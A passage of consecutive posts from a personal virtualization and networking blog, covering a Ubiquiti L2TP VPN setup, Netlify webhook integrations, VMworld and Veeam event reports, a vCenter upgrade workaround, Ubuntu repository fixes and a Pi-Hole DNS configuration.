with an amazing team: Burak Bezirci, Senior Consultant, SDDC METNA (Turkey) Christian Mohn, Senior Solutions Architect, Proact (Norway) Domenico Caruso, Consulting Architect, SDDC (Italy) Jason Meers, Senior Systems Engineer, Sub-regional Enterprise SE (UK) And at the end of the week our presentation really came together. In fact, so much so that we were awarded 1st Place Final Team Presentation (Solution Design Architecture)! Way to go team! 1st Place — Team 5 Burak Bezirci, Domenico Caruso, Christian Mohn and Jason Meers, flanked by Carsten Schaefer and Neeraj Arora (Photo by Henry Villar) It has been an exhausting two weeks, but that being said, the time also flew by. If you ever get the chance to attend it, my advise is simply do it. Know what you are getting yourself into, but do it. It is worth your time if you want to enhance your architecture chops. The class of Paris 2019 was a group of extremely talented participants, all of whom passed it with flying colors (scores ranged from 82 to 92 out of 100) and I’m proud to have been a part of this. I think each and every one of the attendees, and the instructors, did a great job of making these 9 days memorable and valuable for everyone. Of course, I’m especially proud of my team who really knocked it out of the park on the last day. We are the kingmakers, right Jason? Oh, and I got this shiny badge too! Now, I’m really looking forward to a week of vacation in Nice — I think have deserved it by now. --- # Guide: Ubiquiti USG Remote User VPN Using L2TP URL: https://vNinja.net/2019/04/10/ubiquiti-usg-remote-user-vpn-using-l2tp/ Date: 2019-04-10 Author: christian Tags: networking, ubiquiti, USG, VPN, UniFi I’ve recently standardized on Ubiquiti equipment in the new house, and so far I am very happy with it. Wireless is working flawlessly, which is more than I could say for my old setup. A part of the new setup is a UniFi® Security Gateway (USG) that I am using as my gateway/firewall for my fiber connection, so I thought why not use that a my VPN termination as well? OpenVPN has been my weapon of choice for years, and it has been doing it very well, but it seems a bit overkill to run an entire VM to provide that service — as well as the ongoing maintenance it requires in terms of OS-patching and so on. Note that all screenshots are from UniFi Controller v5.10.20 On the USG there are basically 2 (well 3, but who’s counting) steps required to set up the VPN connection for Remote Users: The following information was correct at the time of posting, based on a setup with 1 x UniFi Security Gateway 3P (4.4.41.5193700), 1 x UniFi Switch 8 POE-60W (4.0.42.10433) and 5 x UniFi AP-AC-Mesh (4.0.42.10433) 1. Configuring the UniFi RADIUS server # In order to be able to authenticate users, the UniFi RADIUS Server needs to be enabled and configured. This is done by navigating to the UniFi Controller, and going to Settings->Services->RADIUS and the Server tab: Enable the server, if it isn’t already. I used all the default settings here, except for the Secret. The Secret here is a custom pre-shared key that Radius uses to authenticate devices and users with the service. Define this as you see fit, or use a generator to create it. Put in your values, and hit Apply Changes 1.1 Creating a RADIUS user account # Navigate to Settings -> Services -> RADIUS and find the Users tab and hit the +Create New Users button. This will bring up the option to create a new user, simply fill out the desired username and password here. For this post I’ll just leave the VLAN part empty, but it allows you to put your VPN clients into different VLANS if you so desire (which is pretty nifty actually!) For Tunnel Type use 3 - Layer Two Tunneling Protocol (L2TP) and for Tunnel Medium Type use 1 - IPv4 (IP Version 4) And that’s both your RADIUS server and first user account taken care of! 2. Creating a remote user network # Next up is defining a network for the remote users. This is a simple, but very powerful step. Navigate to Settings->Networks and click on the +Create New Network button. This, naturally, brings up the Create New Network screen where you can put in your details. Use your own values for all of this, the most important thing is to select Remote User VPN as the Network purpose, chose L2TP Server as the VPN type and and define a proper Pre-Shared Key. The Pre-Shared Key is needed by clients in addition to the username and password defined in step 1.1 above. I decided to call it Remote User VPN (L2TP), to make it easy to identify. For good measure I defined an entire Class C subnet for my VPN users, because you know, there will definitely be 254 simultaneous connections to my home network at any given time… The important thing to note is that when you define a network for Remote Users, it needs to be a different network than your default network. The IP addresses cannot overlap or otherwise conflict with any other defined networks on the controller. This is simply a dedicated network, that by default has full connectivity to the other networks defined on the controller. If you want to limit it somehow, you need to put in place firewall rules that limits its access to the other network(s). Once a client connects, it gets assigned an IP-address from the assigned pool automatically, there is no need to configure any further DHCP services or similar in that network. You may need to manually specify your DNS servers here, try with automatic but if you can not connect via FQDN after a successful VPN connection, odds are that you will need to manually specify your internal DNS servers here as well. Configuring your L2TP VPN Client # And that’s it, you should now be able to connect using a standard L2TP client, using the external IP of your controller (I use a dynamic DNS service for this), your defined username/password and the Pre-Shared Key from the network definition as the Machine Authentication Shared Secret. This is what it looks like using the native OS X Client: Update 06. august 2019 # Thanks to Michael White (notesfrommwhite.net) for asking a few questions that made me update this post with a few more details on the macOS client setup (and the potential DNS issue mentioned above) I seem to have forgotten to mention a minor detail in my original post. In order to make your Mac (and possibly also Windows) able to connect to your internal resources via the DNS server specified above or via IP, you need to do one last thing. Since L2TP connections do not publish routes, the VPN traffic does not really know where to go — which is kind of bad. On macOS this is sorted by either sending all traffic though the VPN connection or re-arranging your network service order. You can also add static routes, but that is a bit more complex, and requires manual updates if you change something, and might cause other problems if you connected to a network that has the same private IP range as your defined VPN network — so I’ll leave that out for now. For more details on macOS and static routes, see Persistent Static Routes in macOS Send all traffic over the VPN # You can force all your networking traffic to go over the VPN connection, by enabling Send all traffic over VPN connection* under Advanced… in the macOS network configuration: Changing the macOS Service Order # This was a new one for me, but changing the service order of your network connections in macOS so that the VPN connection comes first (highest priority) makes split-tunneling work too! This way you can access resources in both the local network you are in, as well as resources in your remote VPN network. Best of both worlds! This is done by going to System Preferences -> Network in macOS and then clicking on the little cog icon Then simply drag your VPN connection to the top of the list (or as near the top as it will let you). That takes care of the priority, and makes sure the network traffic to your VPN network is routed before the default network route for your network interface. You should now be able to reach your internal resources, as well as “external” ones. --- # Top vBlog 2018 Results URL: https://vNinja.net/2019/03/27/top-vblog-2018-results/ Date: 2019-03-27 Author: christian Tags: vBlog, Voting It has been a slow year for the vNinja.net site so far, but at least the top vBlog 2018 results were published last week! I am very happy to see that the site is still ranked in the top 25, clocking in at a very respectable 22nd place, and that also puts it into the 7th spot in the Independant Blogger category! Thanks to everyone who voted, it’s genuinely appreciated. For those who missed the announcement webcast, you can check out the recording below: Apparently I am an OG, and yes, John, I am from Norway! --- # Netlify, Slack and IFTTT Webhooks for fun and ... profit? URL: https://vNinja.net/2018/12/13/netlify-webhooks/ Date: 2018-12-13 Author: christian Tags: vninja, site, news, hugo, netlify, integration A few months ago I migrated this site from Wordpress to Hugo, hosted by Netlify, and I have been very happy with it since. As mentioned in the previous post, I utilize webhooks from Netlify to send alerts to Slack whenever a new build is triggered. The setup for this, on Netlify, is very simple but I figured I would write a walk-through anyway. Configuring Slack notifications on Netlify # In order to configure outgoing webhooks from Netlify to Slack, you first need to create the incoming one in Slack. Log into api.slack.com and find Incoming Webhooks under Features. Select Add New Webhook to Workspace, and select which slack channel you want this webhook to post to. Click on Authorize You will now get redirected back to the Incoming Webhooks page, and under Webhook URL you should now find a new URL. Copy this URL. Log into your Netlify account, and go to Settings > Build & deploy > Deploy Notifications Click on Add build hook, and select Slack integration. Now you select what event you want to send to Slack, you can chose between Deploy Started, Deploy succeeded, Deploy failed, Deploy locked and Deploy unlocked. I’ve configured all of these to use the same webhook URL, but you can use different ones for each if you want — but that also requires more than one Incoming Webhook in Slack. Pick the event you want, and paste your Slack Incoming Webhook URL into the form. That is it. Next time your site builds through Netlify, you should see status messages (for the events you selected) appear in your Slack! Pretty easy, especially since Netlify really has done all the work here and made the integration built-in. All you need is a working incoming Slack Webhook, and some configuration. Since I set this up, I’ve been looking at other ways of integrating with Netlify, and webhooks. IFTTT integration # Netlify also allows you to create Incoming Webhooks, like Slack, but for now it seems the only option is what they call Build Hooks. Basically a Build Hook is a secret URL that triggers a new build of someone accesses it. Normally I build this site automatically when commiting new content to GitHub, but it’s also nice to have a way of triggering it manually without having to log into Netlify. In order do do this, I can use a service like IFTTT to trigger it whenever we want to. Log into Netlify and go to Settings > Build & deploy > Build Hooks Click on Add build hook, and give it a name and select which branch you want to use. I use master, since that’s where i build this site from, and click on Save Once the build hook has been created, you will see the URL (I’ve anonymized it here, naturally) Log into IFTTT and create a new applet under My Applets > New Applet. Click on +this and search for the Button widget Next up is the Choose trigger step. Click on Button press, and then +that. For the action service, search for webhooks and select it. Select Make a web request, give it a name and put the URL you got from Netlify in step 3, and paste it into the URL field. Change the Method to POST and scroll down and save it — You do need to put anything into the other fields, only Name, URL and Method are required for this to work. There we are. We now have an IFTTT button that triggers a new build. The nifty thing about this, is that it enables me to trigger a build from my phone, or even my watch! Having some fun # Integrations like this opens up a wide variety of thigs you can do; I guess I can get my kitchen lights to blink when a new build is successful, or even change the color to red if a build fails. My wife would most likely veto that one though, so I’ll have to think of something a bit more subtle for a future project. Perhaps some integrations with vRealize Automation are in order… Oh and yeah, I’m not so sure of the profit part of the title either. --- # Top vBlog 2018 URL: https://vNinja.net/2018/11/19/top-vblog-2018/ Date: 2018-11-19 Author: christian Tags: vBlog, Voting The top vBlog 2018 voting has opened, time to go rock the vote and show your favorite bloggers some love for their hard work and dedication. And just like Robert, use this as a chance to expand your feed reader collection! I am using the #topvblog2018 voting as an opportunity to refresh my #feedly #VMware blog list. All vblogs: https://t.co/nDDTs2wbC0 and vote for your favorite blogs here: https://t.co/FZvTpSOf9G #vExpert — Thefluffysysop (@thefluffysysop) November 19, 2018 Happy voting, and good luck everyone! --- # VMworld 2018 NSX Roving Reporter: Eirik Vada URL: https://vNinja.net/2018/11/10/vmworld-2018-nsx-roving-reporter-eirik-vada/ Date: 2018-11-10 Author: christian Tags: VMworld, VMware, VMworld 2018, TeamProact My good friend, and colleague, Eirik Vada was interviewed by Ather Beg, the NSX Roving Reporter, during VMworld 2018. Since he doesn’t toot his own horn, I decided to do it for him: Have a look at that dashing young man! --- # Headshot-as-a-Service VMworld Europe 2018 URL: https://vNinja.net/2018/11/09/headshot-as-a-service-vmworld-2018/ Date: 2018-11-09 Author: christian Tags: VMworld, VMware, vExpert Headshot-as-a-Service was a success, but I have to say it didn’t quite turn out the way I wanted. Finding a proper location was hard, getting the lighting right (which I do not think I did) and without any advertising except my own blog posts and tweets, the turnout was not quite what I had expected. If I’m doing this again, there are some things that needs to be changed in both execution and setup. Thankfully I have another year to plan it, if I do it again that is. That being said, there are some fun photos in the set. Those of you who attended, go ahead and grab your photo from the Flickr album — and yes Amy, there is NO way I’m not using this as the cover photo! Until next time! --- # VeeamON Virtual 2018 — Reserve Your Seat Now URL: https://vNinja.net/2018/11/09/veeamon-virtual-2018-reserve-your-seat/ Date: 2018-11-09 Author: christian Tags: Event, Veeam Hot on the heels of VMworld Europe 2018, Veeam is hosting its annual virtual conference on december 5th. Just like last year, I will be part of the panel in the Expert Lounge! This online event is a must-attend for IT professionals who are driving their Availability, backup and recovery strategies: Be the first to know all the new features coming in Veeam® Availability Suite™ 9.5 Update 4 Hear from Veeam experts across 15 business, technical, cloud and lab sessions Win prizes throughout the day, including a virtual reality kit! As per usual the event is divided into three tracks; Business, Techincal Track and Cloud Track, each with tailored content. For existing Veeam customers, I really recommend the Veeam Availability Suite™ 9.5 Update 4 session with Michael Cade, as well as Plan for disaster with confidence using automated testing in Veeam Availability Orchestrator with Michael White. Loads of goodies there, and Veeam Availability Suite 9.5 Update 4 really does contain some goodies. Join us for VeeamON Virtual on Dec. 5 to learn more! # --- # VMworld 2018 Europe Day Two URL: https://vNinja.net/2018/11/07/vmworld-2018-europe-day-two/ Date: 2018-11-07 Author: christian Tags: VMworld, VMware, VMworld 2018 VMworld Europe 2018 sets a new attendee record 13.000! I have to say, VMworld this year seems energetic, driven and focused. Even if there isn’t a slew of new product releases, it feels like VMware has switched gears. Pat Gelsingers message about the four superpowers, make sense and everything VMware does is aimed at bridging these. Superpowers # Cloud Mobile AI/ML EDGE/IOT The keynote by Sanjay Poonen on day two continues to drive this message, as well as how we can use technology for good. Robin Matlocks “how do we use our collective talents to ensure we have a better future for everyone“ resonates well, and serves as a great for Martha Lane Fox, the “Dot com dinosaur”. Her talk about the early .com-era and how technology today has a reponsibility to be a force for good was great! I think our superpower as an industry isn’t constrained to the four powers listed above; it is even simpler than that. Our collective superpower is creating and building techonology that benefits mankind. Bold words yes, but it’s true. How can we as technologists help? # Recently I was lucky enough to be the lead architect for the design team that did a complete SDDC deployment for a local health provider. By utilizing vRealize Suite, vSAN and NSX we were able to build a new platform for rapid deployment of machine learning resources for researchers. Once it was up and running, we did a live demo internally that really blew my mind. The researchers uses IoT sensors to measure bodily reactions to activity, and by using machine learning on the live datastream they are able to sense when a subject is in a depressed state. This is coupled with feedback from the subjects as well, via an app on their phone. Hopefully this will also enable them to predict when a subject might be entering a depressed state, and then hopefully also prevent them. The project actually embraces all of the four superpowers; Cloud, Mobile, AI/ML and EDGE/IOT. Hopefully I’ll be able to tell more about that project later, it was a real eyeopener for me and fits into the message VMware pushes here at VMworld. This is the kind of force for good all of us in the tech field can help enable — And we can do it, now. Headshots-as-a-Service # Both on day 1 and on day 2 I did the Headshots-as-a-Service thing in the hallway right past the exit of the VMvillage. Turnout was pretty good, and there is quite a few photos now uploaded to the Flickr-album. Other # Was mildly coersed to be part of #TechConfessions. Should be interesting to see how that video actually turns out… Step count: 12k --- # VMworld 2018 Europe Day One URL: https://vNinja.net/2018/11/06/vmworld-2018-europe-day-one/ Date: 2018-11-06 Author: christian Tags: VMworld, VMware, VMworld 2018 The keynotes at VMworld Europe are always interesting, mostly because one always wonders what was left to announce from the US equivalent that is earlier in the year. This year there was a good gap between the US version in August, and the European one in November, unlike last year when it was only a couple of weeks, so my hope was that there would be some real new news and announcements in Barcelona. I won’t run through the announcements, othes have done a way better job of that already (this list will be updated as more things are posted) VMware Cloud Foundation 3.5 by Gregg Robertson VMware Skyline Updates from VMworld Europe VMware Cloud on AWS expands across Europe and the U.S. Other things to note # VMware has opened up two new beta programs: Project Dimension — Delivering Edge and Data Center Intrastructure-as-a-service Pulse — Delivering Edge and IoT Device Management and Montoring-as-a-service Oh and yeah, VMware just went and aquired Scott Lowe Heptio! Also, fun to see my employers logo in the keynote by Pat Gelsinger! After a great day at the Fira, we ended up at the Cohesity party which had an awesome Queen tribute band playing a full concert. Unbelievable. Step count: 15k --- # Headshot Studio@VMworld Details URL: https://vNinja.net/2018/11/05/headshot-studio@vmworld-details/ Date: 2018-11-05 Author: christian Tags: VMworld, VMware, vExpert As previously announced, I’ll be offering headshots for anyone who pops by at the announced times. After having a look at the VMworld layout this yeah, I’ve found a spot where I can set up everything without causing anyone trouble. Sadly there was not enough available space at the VMTN and VMware {code} area, but luckily there was some space nearby that I can use! At the very end of 6.0 (the hall where the main entrance is), and before the escalators and the entrance to 7.0 Solutions Exchange, there is a hallway on the left hand side when heading towards the Solutions Exchange (see the venue map). I will make sure that those manning the booth in the VMTN and VMware {code} area knows where it is, as well as the vBrownbag crew. There is even a black drape hanging from the ceiling, so there should not be any problems with light spill into the nearby booths either. I will set up “shop” there tomorrow, and here’s the agenda again for good measure: The Times and location # Day Time Location Tuesday 6th October 14:30 - 15:30 Hallway at the end of 6.0 Wednesday 7th October 14:30 - 15:30 Hallway at the end of 6.0 Thursday 8th October 14:30 - 15:30 * Hallway at the end of 6.0 * Cancelled due to solutions exchange closing early. --- # VMworld 2018 Europe Day Zero URL: https://vNinja.net/2018/11/05/vmworld-2018-europe-day-zero/ Date: 2018-11-05 Author: christian Tags: VMworld, VMware, VMworld 2018 Day zero started of with the Nordic & Baltic VMware Partner Briefing Brunch at the Hotel W. The parter briefing contained updates on the way forward for VMware Partner Central as well as upcoming updates to the partner model, something I look forward too. In my opinion, and thankfully VMware’s too, Partner Central is way overdue a major overhaul, so this is good news! After a great lunch and VMware handing out this years regional partner awards, it was time to head to the Fira to get registered. Since the Solutions Exchange is closed Monday, there wasn’t really that much to do other than meet up with a slew of familiar faces for a quick chat. I also did some location scouting for Headshot-as-a-Service and did find a good spot for it (more on that in a later post). Sadly I was unable to pick up and test the equipment 10ZiG has provided for this today, since the Solutions Exchange was closed — I will have to postpone that until tomorrow. Step count: 13k. --- # VMworld 2018 Europe Day Minus One URL: https://vNinja.net/2018/11/04/vmworld-2018-europe-day-minus-one/ Date: 2018-11-04 Author: christian Tags: VMworld, VMware, VMworld 2018, vRockstar I got in to Barcelona yesterday, and I have to say it is really nice to have some time before the actual VMworld crazyness starts. With no need to rush anything, we just found the hotel Arrow ECS Norway has booked for us, and relax. Well, I say relax, but I mean walk around Barcelona like a mad man. 22k steps and 16.3 km takes a toll! The final step count for this week should be pretty insane. This years hotel, the Grand Marina, is located smack dab in the Port of Barcelona. The last few VMworld’s we have stayed at the Pullman Skipper, a great hotel in the Olympic Port, but I like that it has been switched around this year. The Grand Marina is also located closer to La Rambla, which is nice! First order of “official” VMworld business, was dinner with Eirik at my favorite tapas joint, Guru Food & Cocktails — if you’re ever there, don’t leave without checking out the nachos! This was the perfect run up to this years vRockstar party at the Obama English Pub. The vRockstar party has become a staple of the vCommunity, and VMworld Europe, and impressively enough, it is the 7th time Patrick Redknap, Marco Broeken and team arranges the what can only be described as the ultimate kick off for VMworld Europe. Given the amount of work this is, it is truly special that they do this for the vCommunity every year. Huge thanks to them, as well as the sponsors who makes this possible year after year. Even though I did not turn up in the infamous Justin Bieber T-shirt this year, I did “rock” a related t-shirt this year as well (in 2017 I “chickened” out and wore a Foo Fighters one). Yes, I was indeed the one wearing a Harry Styles tee. This whole t-shirt thing has become somewhat of a tradition, and I have one restriction — I’ll only wear t-shirts from acts I’ve actually seen live. vRockstar was, as it always is, awesome and I met up with a bunch of the usual suspects and a bunch of fresh faces as well. A great start to the week, now to get ready for the actual conference… Step count for day zero? Just above 19k. --- # VMworld 2018 Barcelona — Tips from the Nordics URL: https://vNinja.net/2018/10/30/vmwworld-2018-tips-nordic/ Date: 2018-10-30 Author: christian Tags: VMworld, VMware, VMworld 2018, Blogtober2018 Liselotte Foverskov, Blogger, vExpert and VMUG.dk extraordinaire has created a great video with VMworld 2018 tips from various Nordic VMworld-veterans, just in time for the event in Barcelona next week. Check it out # The video features Henrik Moenster, Karina Kathinka Søndergaard, Robert Jensen, Olafur Helgi Haraldsson, Christian Mohn, Kim Højer Jakobsen, Terkel Olsen, Frank Brix Pedersen and Liselotte Foverskov Great tips for and from everyone, see you in Barcelona, and remember; T-shirts are important! Thanks to Liselotte for arranging this! --- # Headshot Studio@VMworld Agenda and Details URL: https://vNinja.net/2018/10/26/headshot-studio@vmworld-agenda/ Date: 2018-10-26 Author: christian Tags: VMworld, VMware, vExpert, Blogtober2018 VMworld Europe 2018 is just over a week away, and I figured it would be time to announce some more details surrounding Headshot-as-a-Service (HaaS). Since I have been unable to secure a permanent location for this at the event, I’ve decided to have it set up somewhere close to the Bloggers Lounge and vBrownbag in the Social Hub. The Times and location # Day Time Location Tuesday 6th October 14:30 - 15:30 Hallway at the end of 6.0 Wednesday 7th October 14:30 - 15:30 Hallway at the end of 6.0 Thursday 8th October 14:30 - 15:30 * Hallway at the end of 6.0 * Cancelled due to solutions exchange closing early. I will get my hands on the equipment sent directly to Barcelona on Monday 5th, and try to to find a suitable location then. I have also decided against having a sign-up form for this, it will be first come, first served at the times and location above — please form an orderly queue. The Equipment # Canon EOS 80D Sigma 35mm F1.4 DG HSM Art Lens Canon EF 70-200mm f/4L USM Lens Canon Speedlite 320EX Canon Speedlite 430EX III 2 x Godox 24-inch x 24-inch Softboxes with stands Fotodiox 5x7’ (Collapsible Black + White 2-in-1 Background) Neewer 43-inch / 110cm 5-in-1 Collapsible Multi-Disc Light Reflectors The How # Since the background size is only 1.5m x 2.1m, which means I will not be able to do full size portraits (hence the Headshots-as-a-Service moniker). Hopefully this should be more than enough to provide proper, and consistent, butterfly lighting in a small space. I really hope that is the case, as I will not be able to test the setup before getting my hands on the lighting equipment at the Fira in Barcelona. The plan is to take a couple of headshots, and have them wirelessly transferred to my MacBook for instant review. Once a picture has been selected, it will be marked for upload. Once the days head shot session is over, I will grab the selected photos, do a quick round of processing and upload them to a pre-made Flickr album where everyone can find them once they are uploaded. I will announce availability of the photos on Twitter, I will not be able to contact each and every one personally to let them know their photo has been published. If possible I will try to capture everyones names while shooting, in order to name the photos properly when uploaded. The images will be licensed with Attribution 4.0 International (CC BY 4.0), which basically means that they are free to use as you see fit. If you use them for anything, I’d love to know though! Once again, huge thanks to 10ZiG for sponsoring this! There is no way this would happen without their support for this small community project. --- # Nordic VMUG Conference 2019 Announced URL: https://vNinja.net/2018/10/24/nordic-vmug-conference-2019/ Date: 2018-10-24 Author: christian Tags: Speaking, UserCon, VMUG, Blogtober2018 VMUG Denmark yet again is arranging the Nordic VMUG Conference, this time in Copenhagen on January 31st 2019. The agenda is still a work in progress, and is not finalized, but the keynotes are: Opening Keynote fra Joe Baguley, VP og CTO, EMEA Closing Keynote fra Seth Shostak, Senior Astronomer SETI Institute The venue is the same as last year, namely the Fields movie theaters and judging by the tweets and photos from the 2018 event that is one awesome VMUG venue. Duncan Epping presenting in 2018. Photo by Liselotte Foverskov I will be attending this year, and it has been a quite few years since the last time I was there back in 2015. As it looks now, I’ll even have a session this year, but that is still a work in progress at this point. I can’t wait to see the rest of the agenda, as well as actually attending again. Will I see you there? Register now! Big kudos to the Danish VMUG team who puts this together every year. You’re doing an awesome job organising this! --- # Veeam Vanguard Summit 2018 - a Recap URL: https://vNinja.net/2018/10/22/veeam-vanguard-summit-2018-recap/ Date: 2018-10-22 Author: christian Tags: Travel, Veeam Vanguard, Veeam, Blogtober2018 After decompressing for few days, I’m finally able to wrap my head around the Veeam Vanguard Summit 2018 in Prague. The Veeam team provided loads of great content for us Vanguards, both public, embargoed and NDA rated. I won’t go into much details about the technical content provided by Veeam, since Karl Widmer already has done that in this series of posts: Veeam Vanguard Summit 2018 in Prague – Day 1 Summary Veeam Vanguard Summit 2018 in Prague – Day 2 Summary Veeam Vanguard Summit 2018 in Prague – Day 3 Summary What I will say, however, is that Veeam did an awesome job arranging this event, bringing most of the 2018 Class of Vanguards toghether in Prague. The content was great, and the discussions even better. I’d like to extend my thanks to everyone who contributed but especially to Rick and his Product Strategy Team (with associates). You guys rock! Perhaps we need to start calling you the Rockatron from now on. That being said, the summit would simply not have been such a success without the active collaboration and involvement from the Vanguards themselves. It’s one thing to logistically get everyone to meet up, and plan content beforehand, but what really makes it happen is the people attending. I know I have mentioned this before, but I think the level of engagement the Vanguards display is what really makes the program unique. Another thing is that Veeam facilitates, and even encourages, that you bring your spouse or significant other(s) with you. They were all welcome to join the evening events, which included dinner monday night (we actually drank the bar dry…) and a river boat trip on the Wednesday. There were even kids, and small babies (besides the Vanguards), attending this year, which is just awesome! You can even see them in the official Vanguard Summit 2018 photo: As usual, the Vanguards were pretty active on Twitter during the event, and I have personally never seen such an active WhatsApp group ever… Even if the agenda was pretty packed the whole week, I had time to record a quick Podcast with the Virtually Speaking Podcast, talking about fire, blood and flood and I am looking forward to listening to everyones war stories once these gets published. Next up VMworld Europe 2018! — See you there! --- # vSphere VCSA 6.5 Update 2 to 6.7 Update 1 Upgrade Issues URL: https://vNinja.net/2018/10/17/vsphere-vcsa-6.5u2-to-6.7u1-update-issues/ Date: 2018-10-17 Author: christian Tags: VCSA, VMware, vCenter, Blogtober2018 Now that vSphere 6.7 Update 1 has been released, I jumped at upgrading one of my lab environments from 6.5 Update 2 (which was not a supported upgrade path until 6.7 Update 1), and I pretty much immediately ran into issues. After providing all the details to the upgrade the wizard from the 6.7 Update 1 ISO, I was greeted by the following: The error log shows a somewhat unhelpful error: ERROR + <Errors> + <Error> + <Type>ovftool.http.send</Type> + <LocalizedMsg> + Failed to send http data + </LocalizedMsg> + </Error> + </Errors> Naturally, my main suspect was DNS (It is always DNS. Or NTP), but both forward and reverse DNS lookups works fine, both for my ESXi hosts as well as my existing vCenter. Unable to pinpoint this any further, I decided to try and use IPs for both the existing vCenter as well as the target host for my new VCSA (with the migrated data on it) and all of a sudden it worked fine. I do not really know what the problem is, besides it being related to DNS somehow, but the “fix” seems to be to use IP addresses for your environment in the Upgrade Wizard for VCSA. This is not really a fix, but it is a workaround and it does work. I would love to know why this was a problem, especially since both forward and reverse DNS lookups seem to work just fine in this environment. --- # Veeam Vanguard Summit 2018 - a Precap URL: https://vNinja.net/2018/10/13/veeam-vanguard-summit-2018/ Date: 2018-10-13 Author: christian Tags: Travel, Veeam Vanguard, Veeam, Blogtober2018 For the first time since the Veeam Vanguard program was started in 2015, I will be able to join the Vanguard Summit! This years event takes place next week (October 15th to 18th) in lovely Prague, Czechia. I’ve been in Prague once before, on a school trip when I was 18. I have to admit that I do not really remember much of that trip though, for various reasons best left undocumented… By the looks of it, Veeam has done a great job organizing the event, arranging travel and hotel accomodations for approximately 50 Vanguards from all over the world — That take some organizing! There will be a realluy mixed bag of representatives from Brazil, the US, Australia, the Nordics, and all over Europe. This is the Vanguards chance to get briefed on new developments, but also a great way to provide feedback to Veeam as well. One of the really nice things about the Vangurd program is the two-way street nature of it, it’s not just one-way communication from Veeam, they listen as well. The event agenda looks great too, with a good mix of public content, enbargoed content and even some Rickatron special TOP SECRET content. There is even planned some “responsible enjoyment” in the evenings, and a boat trip with dinner on the Wednesday. Thanks a lot Rick and the rest of the Veeam Vanguard crew for arranging this, I am really looking forward to meeting a slew of old friends, and even more fun, a bunch of new ones I have yet to meet, at least physically. I will be bringing my camera, and hopefully get some good shots of Old Town Prague, especially since the hotel we are staying at is very centrally placed. Even the weather seems to be cooperating this week, with good autumn temperatures and sun! That will make for a great break from the near constant rain we’ve had here in Bergen, Norway for the last month or so. --- # Ubuntu 18.04.1 LTS Bionic Beaver Missing Entries in sources.list URL: https://vNinja.net/2018/10/08/ubuntu-18.04.1-lts-bionic-beaver-sources.list/ Date: 2018-10-08 Author: christian Tags: Ubuntu, Linux, Blogtober2018 While setting up a new Ubuntu 18.04.1 LTS Bionic Beaver VM (which I will be using for a couple of upcoming projects using Grafana and InfluxDB, as well as Pi-Hole), I ran into a small issue where the /etc/apt/sources.list was close to empty: fsociety@test:~$ cat /etc/apt/sources.list deb http://archive.ubuntu.com/ubuntu bionic main deb http://archive.ubuntu.com/ubuntu bionic-security main deb http://archive.ubuntu.com/ubuntu bionic-updates main fsociety@test:~$ That does seem a bit on the too scaled-down side, doesn’t it? Turns out systems that are installed with the Ubuntu 18.04.1 LTS Bionic Beaver live server installer does not have all the normal Ubuntu repositories added to it. In fact, Universe, Multiverse and Restricted repositories are missing. I don’t know if this is a bug that will be fixed, or an intentional change, but it means that a lot of packages you might need are not available for installation after completing the Ubuntu OS setup. And that is simply no fun at all. Either way, I’ve hacked together my own version (basically I’ve just copied it from older releases) of a full sources.list file, and made it available as a gist. This can easily downloaded into your Ubuntu 18.04.1 LTS Bionic Beaver system after a backup of the original one: Backup the original /etc/apt/sources.list # fsociety@test:~$ sudo mv /etc/apt/sources.list /etc/apt/sources.list.backup Download my updated /etc/apt/sources.list # fsociety@test:~$ cd /etc/apt/ fsociety@test:~$ sudo wget https://gist.githubusercontent.com/h0bbel/4b28ede18d65c3527b11b12fa36aa8d1/raw/a4ab1c13a92171822215143b1e3b3eb6add7a78d/sources.list This should add your familiar repositories back, and enable installation of packages from the missing repositories, as well as the main repositories enabled by default. You can test it by running a simple apt-get update command: sudo apt-get update [sudo] password for fsociety: Get:1 http://security.ubuntu.com/ubuntu bionic-security InRelease [83.2 kB] Hit:2 http://us.archive.ubuntu.com/ubuntu bionic InRelease Get:3 http://us.archive.ubuntu.com/ubuntu bionic-updates InRelease [88.7 kB] Get:4 http://us.archive.ubuntu.com/ubuntu bionic-updates/main amd64 Packages [398 kB] Get:5 http://us.archive.ubuntu.com/ubuntu bionic-updates/main Translation-en [149 kB] Get:6 http://us.archive.ubuntu.com/ubuntu bionic-updates/restricted amd64 Packages [7024 B] Get:7 http://us.archive.ubuntu.com/ubuntu bionic-updates/restricted Translation-en [3076 B] Get:8 http://us.archive.ubuntu.com/ubuntu bionic-updates/universe amd64 Packages [559 kB] Get:9 http://us.archive.ubuntu.com/ubuntu bionic-updates/universe Translation-en [145 kB] Get:10 http://us.archive.ubuntu.com/ubuntu bionic-updates/multiverse amd64 Packages [5716 B] Get:11 http://us.archive.ubuntu.com/ubuntu bionic-updates/multiverse Translation-en [3176 B] Fetched 1441 kB in 3s (532 kB/s) Reading package lists... Done And there you go, Universe, Multiverse and Restricted repositories are now available, in addition to default Main. Happy days! Ubuntu 18.04.1 LTS Bionic Beaver /etc/apt/sources.list gist --- # My Pi-Hole Setup URL: https://vNinja.net/2018/10/08/my-pi-hole-setup/ Date: 2018-10-08 Author: christian Tags: Pi-Hole, DNS, Linux, Ubuntu, Blogtober2018 I recently configured a VM with Pi-Hole installed on it, and after running it for a couple of weeks the results are pretty stunning. That is a lot of blocked requests, and I have to say that everything just feels faster, even on my 250 Mbps fiber connection. After playing around with it for a bit, and configuring some of my clients to use it, I decided to go all in. The High Level Architecture I finally settled on looks like this: Basically I want all DNS requests in my local network to run through the Pi-Hole, then to my local DNS server before it gets forwarded out on the big bad interwebs. Currently my Synology NAS also serves as my DHCP and DNS server for my local network. The setup will be similar on whatever DHCP and DNS servers you currently run. In order to get Pi-Hole to filter all my traffic, I configured the DHCP scope to serve the IP address of the Pi-Hole, with the IP of 192.168.5.53 (bonus points for figuring out why it’s .53), instance like this This takes care of any client getting their IP through DHCP, and also sets the Synology (192.168.5.67) itself as the secondary DNS in case the Pi-Hole is not responding for some reason. To make sure external name resolution works too, I’ve configured the Synology DNS server to forward to my external DNS servers of choice, 1.1.1.1 and 1.0.0.1 powered by Cloudflare. Next up was configuring the Pi-Hole itself to forward non-blocked DNS requests to the internal Synology DNS service, and let that handle resolution either local or external. Thankfully this is a pretty easy configuration as well, this time in the Pi-Hole admin interface which is available on http://pi.hole/admin Go to Settings -> DNS and set your custom DNS upstream DNS servers I’ve set mine to first point to my Synology and if that fails, try to go directly to 1.1.1.1. This way I have backup DNS servers both from DHCP, and inside of Pi-Hole itself should either the Pi-Hole VM or the Synology be unavailable (for DHCP I have a backup DHCP scope configured in my router, and activate that should there be a need). Conditional Forwarding # In order to get local name resolution to work properly through Pi-Hole, I also had to configure another setting in Pi-Hole itself. On the 